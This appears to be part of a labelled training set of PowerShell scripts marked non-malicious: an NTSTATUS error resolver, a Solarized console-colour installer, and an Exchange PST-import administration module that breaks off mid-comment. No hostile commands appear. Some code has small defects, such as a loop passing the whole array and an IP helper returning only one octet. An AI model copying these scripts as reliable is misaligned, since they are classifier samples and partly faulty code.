BAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJ # KoZIhvcNAQELBQADggEBAH7qUgt3p9OfBquhiIyWJXT4qqA6yV1T1owQ+3KNgHB1 # kPc9Zo2Td/jHK1sg443ZCLa7KzAqNJN7Hkv05oXOmEeMDld53uclk0OVxJpzUqO6 # Nk9S0ZvYcZAzZPeZV6jgisV6KOo02KMMKBh7D4tBh0soZNlqpRtQCuqXE+NqST8S # x236scBsqJpyWrAsQYVQLaLJEkZCuUWY5hi/5DOc3h7aU9kYu1E6Zx/fgSm0wkJR # VOiJjcULnlebASnKdTmhE4CEDwEkISx22Ohv6f1b78yxW7QRDyRYfamKxpLYcUjh # 1UUf0yfEj6oQlgfK5P3EDmlhx2P928KB4awFLYXJ1YYxggQNMIIECQIBATCBkzB8 # MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVk # bW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1N # aWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAe4F0wIwspqdpwABAAAB # 7jANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEE # MC8GCSqGSIb3DQEJBDEiBCB6aAwcKUozS7b7jz+V0dHxyP+f/lIbFRB5dUf/d6+G # 0jCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EIE9QdxSVhfq+Vdf+DPs+5EIk # Bz9oCS/OQflHkVRhfjAhMIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENB # IDIwMTACEzMAAAHuBdMCMLKanacAAQAAAe4wIgQgmxnWBa69rjeszs+eDaMhfBYw # yjK9UCo3wRSwb7HsQJ4wDQYJKoZIhvcNAQELBQAEggIADn1g6Rln2qSe7imc8yq/ # w614b3Nf64f0gIkmqswQjnD9412vR7PM0eGvGxyGCHC+MqJ8JQJGGinzDPeVAa7+ # sn3NvIkxINr7IF6okpMsEruNVZSvJcOytArfaL2g92irJzLQKGU3BSbEMTCc3tcE # b2MJj2YxSjwLok2ULraJqR+//2O+b7g29ccdUIpne0DURSyqUwtrAiSvoxQWBCme # NCDJh8cj3D8Ibgot7QPxlI9SOLGzdhF3ZelF7A7MrRFDDn5+3Yv8IXf5gsO+JZHz # gpl+P2Jm1LkfjMob4HAkLCpY9kdfrLSq9oFeYUPk8yAynJG65azT0gNl4QkV/nW/ # d+RC+oHoFRbJ0tDkZY/pf4wp6KAAe/MNIXDuvkfKLlz51dQ7avP5ZxtumUc1hz1w # ZJycOh1dSMWmuzVkytjOpQHqp5eyxQTwWQM/pc7g2X2vdStIs8mpopMzvrtCZApP # pYw/9j9JDhz7MmVv0Bk8a7C6uL/YfxzFbFaAjspBI36TOM/SO4A7fFKo2lMMsiLS # WJDcK64yBJnL801dlpbw9Wy8m/Bo4wHroElccO/Tg0b2P3B8QBCY9O76ZW9W36Tj # vdMIgbO7nQ8lkdy2c+R6tJiCla454jc3ub/ttaOHRO2OBcVucKPpnQLHjDxvt3EZ # bNIlQFy0qqcC2/kW6fWOuv8= # SIG # End signature block
combined_dataset/train/non-malicious/Get-NTStatusException.ps1
Get-NTStatusException.ps1
function Get-NTStatusException { <# .SYNOPSIS Resolves an NTSTATUS error code. Author: Matthew Graeber (@mattifestation) .DESCRIPTION Get-NTStatusException returns a friendly error message based on the NTSTATUS code passed in. This function is useful when interacting with Windows Native API functions with NTSTATUS return codes. .PARAMETER ErrorCode An NTSTATUS code returned by a native API function (Nt or Rtl prefixed functions) .EXAMPLE C:\\PS> Get-NTStatusException -ErrorCode 0xC0000005 Invalid access to memory location. .EXAMPLE C:\\PS> 0xC0000005, 0xC0000017, 0x00000000 | Get-NTStatusException Invalid access to memory location. Not enough storage is available to process this command. The operation completed successfully. .LINK http://www.exploit-monday.com/ #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)] [Int32[]] $ErrorCode ) BEGIN { Set-StrictMode -Version 2 $Win32Native = [AppDomain]::CurrentDomain.GetAssemblies() | %{ $_.GetTypes() } | ? { $_.FullName -eq 'Microsoft.Win32.Win32Native' } if ($Win32Native -eq $null) { throw "Unable to get a reference to type: Microsoft.Win32.Win32Native" } $LsaNtStatusToWinError = $Win32Native.GetMethod('LsaNtStatusToWinError', [Reflection.BindingFlags] 'NonPublic, Static') $GetMessage = $Win32Native.GetMethod('GetMessage', [Reflection.BindingFlags] 'NonPublic, Static') } PROCESS { foreach ($Error in $ErrorCode) { $WinErrorCode = $LsaNtStatusToWinError.Invoke($null, @($ErrorCode)) Write-Output $GetMessage.Invoke($null, @($WinErrorCode)) } } END{} }
combined_dataset/train/non-malicious/Install-Solarized_1.ps1
Install-Solarized_1.ps1
[CmdletBinding()] param($Path = "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk" ) # SOLARIZED HEX 16/8 TERMCOL XTERM/HEX L*A*B RGB HSB # --------- ------- ---- ------- ----------- ---------- ----------- ----------- $base03 = "#002b36" # 8/4 brblack 234 #1c1c1c 15 -12 -12 0 43 54 193 100 21 $base02 = "#073642" # 0/4 black 235 #262626 20 -12 -12 7 54 66 192 90 26 $base01 = "#586e75" # 10/7 brgreen 240 #585858 45 -07 -07 88 110 117 194 25 46 $base00 = "#657b83" # 11/7 bryellow 241 #626262 50 -07 -07 101 123 131 195 23 51 $base0 = "#839496" # 12/6 brblue 244 #808080 60 -06 -03 131 148 150 186 13 59 $base1 = "#93a1a1" # 14/4 brcyan 245 #8a8a8a 65 -05 -02 147 161 161 180 9 63 $base2 = "#eee8d5" # 7/7 white 254 #e4e4e4 92 -00 10 238 232 213 44 11 93 $base3 = "#fdf6e3" # 15/7 brwhite 230 #ffffd7 97 00 10 253 246 227 44 10 99 $yellow = "#b58900" # 3/3 yellow 136 #af8700 60 10 65 181 137 0 45 100 71 $orange = "#cb4b16" # 9/3 brred 166 #d75f00 50 50 55 203 75 22 18 89 80 $red = "#dc322f" # 1/1 red 160 #d70000 50 65 45 220 50 47 1 79 86 $magenta = "#d33682" # 5/5 magenta 125 #af005f 50 65 -05 211 54 130 331 74 83 $violet = "#6c71c4" # 13/5 brmagenta 61 #5f5faf 50 15 -45 108 113 196 237 45 77 $blue = "#268bd2" # 4/4 blue 33 #0087ff 55 -10 -45 38 139 210 205 82 82 $cyan = "#2aa198" # 6/6 cyan 37 #00afaf 60 -35 -05 42 161 152 175 74 63 $green = "#859900" # 2/2 green 64 #5f8700 60 -20 65 133 153 0 68 100 60 # Requires the "Get-Link script":http://poshcode.org/2493 $lnk = Get-Link $Path ## On Windows, we don't have "Magenta" and "BrightMagenta" -- We have "Magenta" and "DarkMagenta" ## In any case, the Solarized order is confusing, so we'll use the .Net ConsoleColor order instead $lnk.ConsoleColors[0] = $Base03 $lnk.ConsoleColors[1] = $Base02 $lnk.ConsoleColors[2] = $Base01 $lnk.ConsoleColors[3] = $Base00 $lnk.ConsoleColors[4] = $Base0 $lnk.ConsoleColors[5] = $Violet $lnk.ConsoleColors[6] = $Orange ## Yes, these really are switched, numerically speaking ... ## They're really DarkWhite (Gray) and LightBlack (DarkGray) $lnk.ConsoleColors[7] = $Base2 $lnk.ConsoleColors[8] = $Base1 $lnk.ConsoleColors[9] = $Blue $lnk.ConsoleColors[10] = $Green $lnk.ConsoleColors[11] = $Cyan $lnk.ConsoleColors[12] = $Red $lnk.ConsoleColors[13] = $Magenta $lnk.ConsoleColors[14] = $Yellow $lnk.ConsoleColors[15] = $Base3 $lnk.Save()
combined_dataset/train/non-malicious/PSTUtility_2.psm1.ps1
PSTUtility_2.psm1.ps1
#============================================================================= # # PST Utilities - For Discovery, Import, Removal # # Dan Thompson # dethompson71 at live dot com # # This collection of tools for importing PSTs has been pieced together # over many months of trial and error. # # Goal is to get PST files off the user's home share and into an archive mailbox. # # Throughout these scripts, what Microsoft calls a "Personal Archive" and # "Archive Mailbox," we call an "Online PST" or "Online Archive PST." # All these terms are the same thing. # # We used the name "Online PST" due to the user's fear of the word "Archive" # # They thought we were pushing their mail down some hole and they would # never see it again. "Online PST" is more friendly and helps them understand # the overall goal. Once we started importing PSTs for users, others saw the # increased quota, as well as seeing the mail in OWA, and many requests # started pouring in. # # All part of our evil plan to erradicate PST files. ;) # # The reason we created these scripts and made particular choices are detailed here: # http://powershellatwork.blogspot.com/2012/01/enterprise-wide-pst-import-beginnings.html # # Yes, we know about the tool PST Capture, but it just wasn't going to work for us. # # requires Quest Powershell Commands for Active Directory # (Active Roles Management Shell) # http://www.quest.com/powershell/activeroles-server.aspx # # I don't claim any of this to be perfect or work for every person out of the # box. You will certainly have to modify some settings to begin using this set # of tools in your environment. # # I hope someone can use this as a starting point if they are in a # similar situation. # # I also suggest you at least try PST Capture first. It did not work for me for # varous reasons. Your mileage may vary. # # #============================================================================= #============================================================================= # File Locations: PSTImportJobQueue; ReportJobQueue; PSTFileLogQueue #============================================================================= #====> TO DO -- add your servername and drive location $Script:PSTServer = '<ServerBIOSName>' # example 'Ex01' $Script:PSTDrive = '<drive>' # admin share example: 'd$' $Script:PSTShareDir = '\\\\' + $Script:PSTServer + '\\PSTImports' #Exchange servers must have rights to this share $Script:PSTUNCDir = '\\\\' + $Script:PSTServer + '\\' + $Script:PSTDrive + '\\Web\\Data\\pstimports' #UNC path to same share $Script:CASConnectLogDir = '\\\\' + $Script:PSTServer + '\\' + $Script:PSTDrive + '\\Web\\Data\\CASConnectLogs' # where 'Connect' logs are kept $Script:ReportsUNCDir = '\\\\' + $Script:PSTServer + '\\' + $Script:PSTDrive + '\\Web\\Data\\Current' #UNC path to report results $Script:PSTQueueFile = $Script:PSTShareDir + '\\PSTImportJobQueue.csv' $Script:PSTCompeletDir = $Script:PSTShareDir + '\\^Completed' # so it always shows at the top $Script:PSTCompleteFile = $Script:PSTShareDir + '\\PSTImportCompleteQueue.csv' # Completed PST Import Jobs $Script:NotifiedFile = $Script:PSTShareDir + '\\PSTImportJobNotified.txt' # Users who have been notified $Script:ArchReportFile = $Script:PSTUNCDir + '\\ArchiveReport.csv' # The daily archive report (also a webpage) $Script:ArchPSTFile = $Script:PSTUNCDir + '\\ArchivePSTHistory.csv' # history of PSTs owned by Archive Mailbox users $Script:MoveFileLog = $Script:PSTUNCDir + '\\MovePSTFIles-' + $Script:T + '.log' # the Move log created when run $Script:AllPSTFileLog = $Script:PSTUNCDir + '\\AllPSTHistory.csv' # the history of ALL PST files discovered # always shows at the bottom of directory listings $Script:ImportQueueFileBU = $Script:PSTShareDir + '\\ZZSavedQueueLogs\\PSTImportJobQueue' + "-" + $Script:TE + ".csv" # backup of ImportQueue $Script:CompleteQueueFileBU = $Script:PSTShareDir + '\\ZZSavedQueueLogs\\PSTImportCompleteQueue' + "-" + $Script:TE + ".csv" #backup of Completed Jobs $Script:ArchReportFileBU = $Script:PSTUNCDir + '\\ZZSavedQueueLogs\\ArchiveReport-' + $Script:TE + '.csv' #back up of a report that is generated daily? $Script:ArchPSTFileBU = $Script:PSTUNCDir + '\\ZZSavedQueueLogs\\ArchivePSTHistory-' + $Script:TE + '.csv' # back up of ArchiveMailboxOwners PSTs $Script:AllPSTFileLogBU = $Script:PSTUNCDir + '\\ZZSavedQueueLogs\\AllPSTHistory-' + $Script:TE + '.csv' # backup of history of ALL psts discovered #============================================================================= # Variables #============================================================================= # This site name is used to determine what tool is used to copy files. # Copy-item is used for local PST files; BITS is used for distant files. $Script:LocalADSite = 'HQ' $Script:PSTUtilityVersion = "14.1.20121015" $Script:MinRunJobs = 9 # minimum jobs running before we start more - 0 means no jobs can be running $Script:MaxRunJobs = 19 # how many job can run at once $Script:FreeSpaceLimit = 199471 # set in MB, the lowest you want free space to go on the Import Share $Script:T = Get-Date -Format yyyyMMdd # today $Script:TE = Get-Date -Format yyyyMMddhhmmss # today extended $Script:SMTPServer = "smtpserver.domain.com" # where to send $Script:AdminEmail = "admin1@domain.com, admin2@domain.com" # gets notified, sent daily summary report email $Script:BossEmail = "boss@domain.com" # send daily report on Wednesday only (Weekly Summary Report) $Script:FromEmail = "EmailTeam@domain.com" # from address of reports to porcessed users $Script:FromReportEmail = "PSTReports@domain.com" # from Address of manager's summary reports #============================================================================= # these are all the people that have applications which generate and process .PST files # but are Java configuration files. Not Mail. Ignore anything not in an "Outlook" directory # --> Add DisplayName of user... $Script:SpecialPeople = @("<DisplayName1>","<Displayname2>") #============================================================================= # These users will be ignored and not 'messed with' # There will be some ;) $Script:IgnoreUsers = @("<DisplayName1>","<DisplayName2>") #============================================================================= # Job Objects: PSTJob; ReportJob; PSTFileLog #============================================================================= Function New-PSTFileLogObject(){ <# .SYNOPSIS Return a new object to track a PST file. .DESCRIPTION Return a new object to track a PST file. This is created for each new PST discovered for any user #> $PSTObj = New-Object PSObject $PSTObj | Add-Member -type NoteProperty -name UNCFullPathName -value (0) $PSTObj | Add-Member -type NoteProperty -name LastWriteTime -value ("") $PSTObj | Add-Member -type NoteProperty -name Size -value (0) $PSTObj | Add-Member -type NoteProperty -name IgnoreFile -value ("FALSE") $PSTObj | Add-Member -type NoteProperty -name DateRemoved -value ("") $PSTObj | Add-Member -type NoteProperty -name BackupFolksNotified -value ("FALSE") $PSTObj | Add-Member -type NoteProperty -name AgeInDays -value (0) $PSTObj } Function Get-ArchPSTIndex ($PST=$null) { <# .SYNOPSIS Creates or finds an index number for PST name. .DESCRIPTION Creates or finds an index number for PST name. Uses the full UNC path for index building #> $Return = $null` If ($Script:PSTIndex.ContainsKey($PST.VersionInfo.FileName)) { # return the Index number $Return = $PSTIndex.Item($PST.VersionInfo.FileName) } Else { # not found so this is a never before see file # create the entry for the file $PSTLog = New-ArchPSTFileLogObject $PSTLog.UNCFullPathName = $PST.VersionInfo.FileName $Script:ArchPSTQueue += $PSTLog # create the index and add it to $Script:PSTIndex.Add($PSTLog.UNCFullPathName,$Script:ArchPSTQueue.Count) $Return = $Script:ArchPSTQueue.Count } $Return } Function New-ArchPSTFileLogObject(){ <# .SYNOPSIS Return a new object to track PST file. .DESCRIPTION Return a new object to track a PST file. This is created for each new PST discovered for any users with an Archive Mailbox #> $PSTObj = New-Object PSObject $PSTObj | Add-Member -type NoteProperty -name UNCFullPathName -value (0) $PSTObj | Add-Member -type NoteProperty -name LastWriteTime -value ("") $PSTObj | Add-Member -type NoteProperty -name Size -value (0) $PSTObj | Add-Member -type NoteProperty -name IgnoreFile -value ("FALSE") $PSTObj | Add-Member -type NoteProperty -name DateChecked -value ("") $PSTObj | Add-Member -type NoteProperty -name BackupFolksNotified -value ("FALSE") $PSTObj | Add-Member -type NoteProperty -name AgeInDays -value (0) $PSTObj | Add-Member -type NoteProperty -name AcctName -value ("") $PSTObj | Add-Member -type NoteProperty -name Dept -value ("") $PSTObj | Add-Member -type NoteProperty -name Server -value ("") $PSTObj | Add-Member -type NoteProperty -name DateDiscovered -value (Get-date) $PSTObj | Add-Member -type NoteProperty -name DateCreated -value ("") $PSTObj } Function Get-PSTFileIndex ($PST=$null) { <# .SYNOPSIS Creates or finds an index number for PST name. .DESCRIPTION Creates or finds an index number for PST name. Uses the full UNC path for index building #> $Return = $null` Write-Host "Enter [Get-PSTFileIndex]: $(($PST).VersionInfo.FileName) Count: $(($Script:AllPSTQueue).Count)" If ($Script:PSTIndex.ContainsKey($PST.VersionInfo.FileName)) { # return the Index number $Return = $Script:PSTIndex.Item($PST.VersionInfo.FileName) Write-Host "Found [Get-PSTFileIndex]: $($Return)" } Else { # not found so this is a never before seen file # create the entry for the file $PSTLog = New-PSTFileLogObject $PSTLog.UNCFullPathName = $PST.VersionInfo.FileName Write-Host "Fullname $(($PSTLog).UNCFullPathName)" Write-Host "Before: " $PSTLog $Script:AllPSTQueue += $PSTLog Write-host "After: " $Script:AllPSTQueue[-1] # create the index and add it to #$Script:PSTIndex.Add($_.UNCFullPathName,$i) $Script:PSTIndex.Add($PSTLog.UNCFullPathName,($Script:AllPSTQueue).Count-1) Write-Host "Added? : " $Script:PSTIndex.Get_item($PSTLog.UNCFullPathName) $Return = ($Script:AllPSTQueue).Count -1 Write-host "Try to reindex in: " $Script:AllPSTQueue[($Return)] Write-Host "Add [Get-PSTFileIndex]: $($Return)" } Write-Host "Leave [Get-PSTFileIndex]" $Return } Function New-PSTJobObject() { <# .SYNOPSIS Object for storing information about a PST Import Job. .DESCRIPTION Object for storing information about a PST Import Job. A user many have many Jobs, one for each PST file being imported. #> $PSTJob = New-Object PSObject # User Related $PSTJob | Add-Member -type NoteProperty -name JobName -value ("") # <userobj>-<filename> $PSTJob | Add-Member -type NoteProperty -name JobStatus -value ("") # <> $PSTJob | Add-Member -type NoteProperty -name UserMBX -value ("") # DisplayName $PSTJob | Add-Member -type NoteProperty -name UserEmail -value ("") # PrimarySMTPAddress $PSTJob | Add-Member -type NoteProperty -name UserObj -value ("") # NTAccopuntName $PSTJob | Add-Member -type NoteProperty -name HomeDir -value ("") # from QADuser $PSTJob | Add-Member -type NoteProperty -name ClientVer -value ("") # from CAS logs if found $PSTJob | Add-Member -type NoteProperty -name ClientVerOK -value ("") # True/False # User PC Related $PSTJob | Add-Member -type NoteProperty -name IP -value ("") # ComputerName, IP, or None (order of preference) $PSTJob | Add-Member -type NoteProperty -name OSname -value ("") # X, 7, or none # PST File Related $PSTJob | Add-Member -type NoteProperty -name ProcessFile -value ($True) # for potentially turning off one PST in a group $PSTJob | Add-Member -type NoteProperty -name OrgFileName -value ("") # should be file name only $PSTJob | Add-Member -type NoteProperty -name OrgUNCName -value ("") # UNC file name Original location $PSTJob | Add-Member -type NoteProperty -name TargetDir -value ("") # target directory for creation $PSTJob | Add-Member -type NoteProperty -name TargetUNCName -value ("") # UNC file name Target location $PSTJob | Add-Member -type NoteProperty -name FileSize -value (0) # file size in MB $PSTJob | Add-Member -type NoteProperty -name FileLastWrite -value ("") # last write time of file # Migration Related $PSTJob | Add-Member -type NoteProperty -name TargetDB -value ("") # target archive mailbox location $PSTJob | Add-Member -type NoteProperty -name MRServer -value ("") # which MRS server to use - depends on AD site $PSTJob | Add-Member -type NoteProperty -name LastNumBI -value (0) # from results, how many bad items did we encounter? $PSTJob | Add-Member -type NoteProperty -name UseTargetRootFolder -value ($true) # True/False $PSTJob | Add-Member -type NoteProperty -name TargetRootFolder -value ("") # True/False $PSTJob | Add-Member -type NoteProperty -name JobCreationTime -value ($null) # Update Related $PSTJob | Add-Member -type NoteProperty -name LastCheckTime -value ($null) # last time this entry processed $PSTJob | Add-Member -type NoteProperty -name InProgressTime -value ($null) # from results $PSTJob | Add-Member -type NoteProperty -name OverAllTime -value ($null) # from results $PSTJob | Add-Member -type NoteProperty -name ExpandedErrs -value ($null) # any encountered errors $PSTJob | Add-Member -type NoteProperty -name RegPSTGrow -value ($false) # has been added to group for GPO to PSTDisableGrow?- my signal this user is complete - check membership $PSTJob | Add-Member -type NoteProperty -name SkipReason -value ("") # when a file is skipped, Size, Age, or Failed $PSTJob } Function New-PSTReportObj (){ <# .SYNOPSIS PST Report Object for tracking the progress of PST migration. .DESCRIPTION PST Report Object for tracking the progress of users with an Archive Mailbox and their progress at removing PST files from their home drives. #> $ReportObj = New-Object PSObject # OverallUser Info $ReportObj | Add-Member -type NoteProperty -name DisplayName -value ("") # PST Information $ReportObj | Add-Member -type NoteProperty -name InUsePST -value (0) $ReportObj | Add-Member -type NoteProperty -name HDrvPST -value (0) $ReportObj | Add-Member -type NoteProperty -name HDrvSize -value (0) $ReportObj | Add-Member -type NoteProperty -name ImpPST -value (0) $ReportObj | Add-Member -type NoteProperty -name ImpSize -value (0) $ReportObj | Add-Member -type NoteProperty -name TotalSize -value (0) $ReportObj | Add-Member -type NoteProperty -name SkippedPST -value (0) $ReportObj | Add-Member -type NoteProperty -name DaysSinceImport -value (0) $ReportObj | Add-Member -type NoteProperty -name GPO -value ("") $ReportObj | Add-Member -type NoteProperty -name '-' -value ("") # General MBX INfo $ReportObj | Add-Member -type NoteProperty -name MBXDB -value ("") $ReportObj | Add-Member -type NoteProperty -name ArchDB -value ("") $ReportObj | Add-Member -type NoteProperty -name MBXSize -value (0) $ReportObj | Add-Member -type NoteProperty -name MBXQuota -value (0) $ReportObj | Add-Member -type NoteProperty -name ArchSize -value (0) $ReportObj | Add-Member -type NoteProperty -name ArchQuota -value (0) $ReportObj | Add-Member -type NoteProperty -name InitArchSize -value (0) $ReportObj | Add-Member -type NoteProperty -name ArchGrowth -value (0) $ReportObj | Add-Member -type NoteProperty -name DateCreated -value ((Get-Date)) $ReportObj } Function Reset-PSTBackupFileNames () { <# .SYNOPSIS Reset Backup file names to current time .DESCRIPTION Reset them all so that you'll be guaranteed to have the correct name each time #> $Script:TE = Get-Date -Format yyyyMMddhhmmss # today extended $Script:ImportQueueFileBU = $Script:PSTShareDir + '\\ZZSavedQueueLogs\\PSTImportJobQueue' + "-" + $Script:TE + ".csv" $Script:CompleteQueueFileBU = $Script:PSTShareDir + '\\ZZSavedQueueLogs\\PSTImportCompleteQueue' + "-" + $Script:TE + ".csv" $Script:ArchReportFileBU = $Script:PSTUNCDir + '\\ZZSavedQueueLogs\\ArchiveReport-' + $Script:TE + '.csv' $Script:ArchPSTFileBU = $Script:PSTUNCDir + '\\ZZSavedQueueLogs\\ArchivePSTHistory-' + $Script:TE + '.csv' $Script:AllPSTFileLogBU = $Script:PSTUNCDir + '\\ZZSavedQueueLogs\\AllPSTHistory-' + $Script:TE + '.csv' } #============================================================================= # Helper Functions #============================================================================= Function CC () { <# .SYNOPSIS a utility to return the count of members in a collection .DESCRIPTION a utility to return the count of members in a collection 0, 1, or many ... #> Param ( $Col ) if ($Col) { if ($Col.Count -eq $null) { $Cnt = 1 } Else { $Cnt = $Col.Count } } Else { $Cnt = 0 } $Cnt } Function isMemberOf() { <# .SYNOPSIS A utility to check if a mailbox is a member of a group. .DESCRIPTION A utility to check if a mailbox is a member of a group. #> Param ( [string] $groupName, [string] $MemberName # displayname ) $m = Get-QADGroupMember $groupName -SizeLimit 0 | where { $_.Displayname -eq $memberName } if($m) {$true} else {$false} } Function WhoAmI () { <# .SYNOPSIS sometimes you want to know who is running this job ;) .DESCRIPTION ometimes you want to know who is running this job ;) #> ([System.Security.Principal.WindowsIdentity]::GetCurrent()).Name } Function Get-ISODayOfWeek { <# .SYNOPSIS Get the correct (according to ISO 8601) day of the week .DESCRIPTION For any given date you get the day of the week, according to ISO8610 .PARAMETER Date The date you want to analyze. Accepts dates on the pipeline #> Param([DateTime]$date=$(Get-Date)) Process { if($_){$date=$_} @(7,1,2,3,4,5,6)[$date.DayOfWeek] } } Function Get-FreeDiskSpace($drive,$computer) { <# .SYNOPSIS Utility to discover the free space of a drive .DESCRIPTION Utility to discover the free space of a drive Used to decide if there is enough space to copy a PST file to either the Temp processing area, or to the local PC for backup. #> $driveData = Get-WmiObject -class win32_LogicalDisk -computername $computer -filter "Name = '$drive'" #"$computer free disk space on drive $drive" "{0:n2}" -f ($driveData.FreeSpace/1MB) } Function ConvertTo-ComputerName() { <# .SYNOPSIS Resolve the IP to a computer name .DESCRIPTION CAS logs record IP address for a user, but those can change over time resolve the IP to a computer name to save in the PST Job Queue - try to look up in DNS - 90% of time this will be an IP #> Param ( $FindName ) $Return = $null $ErrorActionPreference = "SilentlyContinue" $c = [System.Net.Dns]::GetHostbyAddress($FindName).HostName $ErrorActionPreference = "Continue" if ($c) { $Return = ($c.Split(".")[0]).ToUpper() } Else { $Return = $FindName } $Return } Function ConvertTo-IP () { <# .SYNOPSIS Lookup IP using the ComputerName .DESCRIPTION CAS logs record IP address for a user, but those can change over time resolve the IP to a computer name to save in the PST Job Queue #> Param ($FindName) $Return = $null $ErrorActionPreference = "SilentlyContinue" $c = [System.Net.Dns]::GetHostEntry($FindName).Addresslist[0].ToString() $ErrorActionPreference = "Continue" if ($c) { $Return = ($c.Split(".")[0]).ToUpper() } Else { $Return = $FindName } $Return } Function Clean-OnlinePSTGPO(){ <# .SYNOPSIS Clear up GPO group and make sure it has only the correct members .DESCRIPTION Clear up GPO group and make sure it has only the correct members .Notes In our world, there are 2 types of PST file users: Controled and Non-Controlled Controled Users: New users created after a certain date (1FEB2012) and Users migrated to Online PSTs Non-Controlled Users: Those users created befor 1FEB2012 and not having been migrated. Eventually the Non-Controlled user will disappear. At least, we can hope. #> $GPO = get-group 'GPO-ReadOnlyPST' | select -ExpandProperty Members $GPO | %{ Write-Host "Working " $_.ToString() $Dumpable = $false $Reason = "None" $MBX = get-mailbox $_.ToString() # Does User even have a mailbox? if(! (($MBX).DataBase.Name)) { $Dumpable = $true $Reason = "NoMailbox" } Elseif (!(($MBX).ArchiveDataBase.Name)) { #Has Mailbox but No Archive if ((get-date '2/1/2012') -gt (get-date ($MBX).WhenMailboxCreated)){ $Dumpable = $true $Reason = "No archive and 2/1/2012 is greater than " + $(($MBX).WhenMailboxCreated) } } if ($Dumpable){ #remove them from the group (GPO). Write-Host "Removing: " ($MBX).Displayname " - " $Reason Remove-QADGroupMember -Identity 'GPO-ReadONlyPST' -Member $_.ToString() } } # "{0,30}`t{1,10}`t{2,25}" -f (($MBX).DataBase.Name), (($MBX).ArchiveDataBase.Name),((get-date '2/1/2012') -gt ($MBX).WhenMailboxCreated)} } #============================================================================= # User Obj Functions - Done #============================================================================= Function Add-ToGPO ($User = $null) { <# .SYNOPSIS Add user to a group that defines scope of GPO to Disallow PST Growth .DESCRIPTION In our organization our GPO that disallows PST growth is governed by a group during the transition, later we can apply that setting worldwide. For users to be comfortable, they need to Read their old PST files They can then check our work for themselves. #WarmAndFuzzyFactor These skipped users are legal discovery people that need to continue to create PSTs as they gather info for Lawyer types. #> if ($User) { if (-not ($Script:IgnoreUser -contains (get-mailbox $User).SamAccountName)) { Add-QADGroupMember -Identity 'gpo-ReadonlyPST' -Member (get-mailbox $User).SamAccountName } } } Function Adjust-Quota ($User = $null) { <# .SYNOPSIS Make sure people are not hit by a quota during their transition. .DESCRIPTION Make sure people are not hit by a quota during their transition Set new quota to 500MB -- unless theie quota is already huge #> if ($User) { $MBX = get-mailbox $User # what is current quota $UsingDBQuotas = $MBX.UseDatabaseQuotaDefaults if ($UsingDBQuotas -eq $True){ $Database = Get-MailboxDatabase -Identity $MBX.Database $ProhibitSendQuota = $Database.ProhibitSendQuota.value.ToMB() -as [Int] $IssueWarningQuota = $Database.IssueWarningQuota.value.ToMB() -as [Int] } Else { $ProhibitSendQuota = $MBX.ProhibitSendQuota.value.ToMB() -as [Int] $IssueWarningQuota = $MBX.IssueWarningQuota.value.ToMB() -as [Int] } $NewProhibitSendQuota = 500 -as [int] $NewIssueWarningQuota = 450 -as [int] # this has bit me b4, so changed it to "-as [int]" above for better results if($NewIssueWarningQuota -gt $IssueWarningQuota) { Set-Mailbox -Identity $MBX -UseDatabaseQuotaDefaults:$False -ProhibitSendQuota 500MB -IssueWarningQuota 450MB -ProhibitSendReceiveQuota "Unlimited" } } } Function Get-ClientAccessUserLog () { <# .SYNOPSIS Discover a user's Client and IP information. .DESCRIPTION Discover a user's client and IP information. Script uses this function too. There is also nightly process that runs which gets all the "connect" log entries for OUTLOOK.EXE. It's run overnight. Initially we were looking at all the logs and that was very teadious. Now we search an already created subset. It's best to pass in the LegacyExchangeDN and SAMAccountName from the mailbox object from testing it seems to get better results right now using both There is no way of knowing where this user logged in so we must search all CAS servers until we find a "connect" entry and pass the full line back Also users can log in from many PCs -- we only want the most used so look thru the full day and get all info you can, then group by IP and take the one with the most connects. alas, sometimes you won't find anything ... #> param ( $DisplayName = $null, $SamName = $null, $LegacyName = $null, $IP = $null, $SearchDays = 14, [switch]$Quiet ) #----------------------------------------------------------------- $Results = @() If($DisplayName) { #ignore all the other cmdline entries and use this to grab those $MB = Get-SingleMailboxObject $DisplayName $LegacyName = $MB.LegacyExchangeDN $SamName = $MB.SamAccountName } Elseif ($IP) { $LegacyName = $IP } $Days = -1 Do { $Y = Get-Date $((get-date).adddays($Days)) -Format yyyyMMdd if (!($Quiet)) {Write-Host "Searching "$Y} if(Test-path ($Script:CASConnectLogDir + "\\olConnect-"+$Y+"*")) { $tmpResults = gc (gci ($Script:CASConnectLogDir + "\\olConnect-"+$Y+"*")) | ?{($_ -match ($LegacyName + ",")) -and ($_ -match ",,Outlook") -and ($_ -match "Connect,")} #Write-Verbose "Found: [$($tmpResults.count)]" if($tmpResults) { $tmpResults | %{$Results += $_} } } $Days-- } While (!($Results) -And ($Days -gt ($SearchDays * (-1)))) if ($Results) { #split the line(s) found into Name, Version, and IP, and mode $c = $Results | %{"{0};{1};{2};{3}" -f $_.Split(",")[3],$_.Split(",")[6],$_.Split(",")[8],$_.Split(",")[7]} # this will sort the ips to the most common one, ie: users logs into 6 machines, # but 1 was 12 times and all the others was 1 each, we get the 12 times $d = $c | %{if($_.split(";")[2]){$_.Split(";")[2]}} | group -NoElement | sort -Descending if($d){ #Just give me the entries with my most common IP $e = $c | ?{$_ -match $d.Values} } #return what you found... if ($e.count) { # Returning 1st entry in array with ips $e[0] } Elseif ($e) { # Returning only entry with ip $e } Else { if ($c.count) { # Returning 1st entry in array with no IP $c[0] } Else { # Returning only entry with no IP $c } } } } Function Get-MRServer ($MBX = $null) { <# .SYNOPSIS Pick an MRSServer in the same AD Site as the destination MBX Database. .DESCRIPTION If you are using deticated 